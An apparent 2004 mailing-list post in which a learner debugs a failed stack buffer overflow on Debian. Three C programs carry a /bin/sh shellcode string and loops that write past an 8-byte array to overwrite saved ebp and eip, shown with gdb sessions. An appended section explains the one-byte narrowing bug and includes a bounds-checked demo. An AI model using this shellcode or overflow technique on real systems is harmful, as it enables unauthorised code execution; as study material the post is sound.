Hi, I'm playing with this lazy code, and I got surprised because while debugging
I see some strange behaviours:
    #include <stdio.h>

    int main(void)
    {
        char foo[8];
        int i;
        /* payload bytes exactly as posted */
        char shellcode[] =
            "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
            "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
            "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
            "\xcd\x80/"
            "/bin/sh"
            "0";

        /* writes past the 8-byte foo on purpose; each foo[i] is a single char,
           so only the low byte of the pointer is stored (hence gcc's warning) */
        for (i = 0; i < 8 + 16; i += 4)
            foo[i] = &shellcode;
        return 0;
    }
With this simple code I want to overwrite ebp & eip.
The ebp addr should be at foo+8 and the eip addr at foo+12.
Compile with the -g option and fire up gdb.
lobillo_at_Sion:~$ gcc -g -o prueba1 prueba1.c
prueba1.c: In function 'main':
prueba1.c:16: warning: assignment makes integer from pointer without a cast
lobillo_at_Sion:~$ gdb -q prueba1
(gdb) r
Starting program: /home/lobillo/prueba1
Program received signal SIGILL, Illegal instruction.
0x400361cf in __libc_start_main () from /lib/libc.so.6
(gdb) i r ebp eip
ebp 0xbffffacc 0xbffffacc
eip 0x400361cf 0x400361cf
(gdb) quit
A debugging session is active.
Do you still want to close the debugger?(y or n)
lobillo_at_Sion:~$
mmmmmm first thing we take a look around and see that ebp and eip contain
different addresses.
Why? I think the overwrite was theoretically implemented, but notice that gdb doesn't
think the same xD.
    <  foo  ><  ebp  ><  eip  >
        8        8        8
        |        |        |
        |--------|--------|------> &shellcode
Well, let's see: eip wasn't overwritten, but was ebp successfully overwritten? Let's
modify the code:
    #include <stdio.h>

    int main(void)
    {
        char foo[8];
        int i;
        /* payload bytes exactly as posted */
        char shellcode[] =
            "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
            "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
            "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
            "\xcd\x80/"
            "/bin/sh"
            "0";

        /* same out-of-bounds loop; the 32-bit constant is narrowed to one
           char per write (gcc's "overflow in implicit constant conversion") */
        for (i = 0; i < 8 + 16; i += 4)
            foo[i] = 0xbffffabc;
        return 0;
    }
lobillo_at_Sion:~$ gcc -g -o prueba2 prueba2.c
prueba1.c: In function 'main':
prueba1.c:16: warning: overflow in implicit constant conversion
lobillo_at_Sion:~$ gdb -q prueba2
(gdb) r
Starting program: /home/lobillo/prueba2
Program received signal SIGSEGV, Segmentation fault.
0x40034370 in _dl_pagesize () from /lib/libc.so.6
(gdb) i r ebp eip
ebp 0xbffffabc 0xbffffabc
eip 0x40034370 0x40034370
(gdb) quit
A debugging session is active.
Do you still want to close the debugger?(y or n)
lobillo_at_Sion:~$
Yep, ebp overwritten, but what about eip? Let's investigate...
    #include <stdio.h>

    int main(void)
    {
        char foo[8];
        int i;
        /* payload bytes exactly as posted */
        char shellcode[] =
            "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
            "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
            "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
            "\xcd\x80/"
            "/bin/sh"
            "0";

        /* loop now starts at foo+8 and stops before foo+16, so it touches
           foo[8] and foo[12] only; each write still stores a single char */
        for (i = 8; i < 16; i += 4)
            foo[i] = 0xbffffabc;
        return 0;
    }
Looking at the code, we notice that the -for- will overwrite only eip, by jumping
over ebp. Let's see what gdb thinks...
lobillo_at_Sion:~$ gcc -g -o prueba3 prueba3.c
prueba1.c: In function 'main':
prueba1.c:16: warning: overflow in implicit constant conversion
lobillo_at_Sion:~$ gdb -q prueba3
(gdb) r
Starting program: /home/lobillo/prueba3
Program received signal SIGSEGV, Segmentation fault.
0x40034370 in _dl_pagesize () from /lib/libc.so.6
(gdb) i r ebp eip
ebp 0xbffffabc 0xbffffabc
eip 0x40034370 0x40034370
(gdb) quit
A debugging session is active.
Do you still want to close the debugger?(y or n)
lobillo_at_Sion:~$
!!!!! ebp is 0xbffffabc? Oops, guys, this is because I wrote all this shit.
I don't understand why eip is not being overwritten and ebp is so strange :P
I'm coding under Debian Woody 3.0, and I notice that Debian has several
differences debugging than other
distros, is it true?
Thanks and sorry for my poor English :P
Received on Mar 10 2004
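Added example (not part of the post above): the loops in the post index a char array, so every `foo[i] = value` stores one byte and skips the next three, which is what both gcc warnings are about. The program below replays those loop bounds on a 24-byte scratch array we own (a constructed stand-in for the foo/ebp/eip region in the post's diagram, nothing is actually overflowed), reports which bytes change, and shows the bounds-checked form of the same write. `replay_char_writes`, `bounded_write`, `REGION` and `FILL` are names chosen here.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Constructed scratch region: 8 bytes standing in for foo, then the 8
 * the post labels ebp and the 8 it labels eip. It is one array we own. */
#define REGION 24
#define FILL 0xAA

/* Replays a posted loop (start, end, step) with char-element writes,
 * exactly as foo[i] = value does: the 32-bit value is narrowed to its
 * low byte. Returns how many bytes of the region were modified. */
int replay_char_writes(unsigned char *region, int start, int end, int step,
                       uint32_t value)
{
    int changed = 0;
    memset(region, FILL, REGION);
    for (int i = start; i < end; i += step) {
        if (i < 0 || i >= REGION)
            continue;                        /* never leave our own array */
        region[i] = (unsigned char)value;    /* narrowing: low byte only */
        changed++;
    }
    return changed;
}

/* Hardened form of the same write: refuses any index outside foo. */
int bounded_write(unsigned char *foo, size_t foo_len, int i, uint32_t value)
{
    if (i < 0 || (size_t)i >= foo_len)
        return -1;                           /* reject instead of writing */
    foo[i] = (unsigned char)value;
    return 0;
}

int main(void)
{
    unsigned char region[REGION];
    int n = replay_char_writes(region, 0, 8 + 16, 4, 0xbffffabcu);
    printf("loop touched %d bytes (one per 4-byte slot):\n", n);
    for (int i = 0; i < REGION; i++)
        printf("%02x%s", region[i], (i % 8 == 7) ? "\n" : " ");
    return 0;
}
```

Every modified byte is 0xbc and each is followed by three untouched 0xAA bytes, so none of the 4-byte slots in the scratch region ever holds the full constant.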